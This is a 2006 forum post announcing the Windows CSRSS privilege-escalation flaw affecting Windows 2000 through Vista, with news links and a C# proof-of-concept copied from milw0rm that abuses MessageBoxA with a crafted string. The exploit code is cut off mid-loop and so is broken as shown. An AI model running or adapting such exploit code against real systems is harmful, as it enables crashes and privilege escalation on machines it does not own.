Vista first vulnerability

Vista first vulnerability

27.12.2006, 15:29

Dracula4ever

Постоянный

Регистрация: 08.05.2006

Сообщений: 559

С нами: 10531106

Репутация: 354

Отправить сообщение для Dracula4ever с помощью AIM

Отправить сообщение для Dracula4ever с помощью Yahoo

Vista first vulnerability

A flaw discovered in the Windows Client/Server Runtime Server Subsystem (CSRSS) processes that allow privilege escalation attack.
the flaw discovered by a russian dude known as NULL.
vulnerable systems: windows 2000\XP\2003\Vista all fully patched. who said Vista has no code re-use..

links:
http://www.securityfocus.com/brief/393
http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757
http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html
http://www.kuban.ru/forum_new/forum2/files/19124.html

exploit code taken from milw0rm:

PHP код:


		
			
// mbox.cs

using System;

using System.Runtime.InteropServices;

class HelloWorldFromMicrosoft

{

 [DllImport(&quot;user32.dll&quot;)]

 unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);



 static unsafe void Main()

 {

   byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};

   uint MB_SERVICE_NOTIFICATION = 0x00200000u;

   fixed(byte* pHelloBug = &amp;helloBug[0])

   {

     for(int i=0; i&gt; csc /unsafe mbox.cs

// &gt;&gt; mbox.exe



// milw0rm.com [2006-12-20]

i wonder if it's the same exploit code hackers were selling - http://www.eweek.com/article2/0,1895,2073611,00.asp ...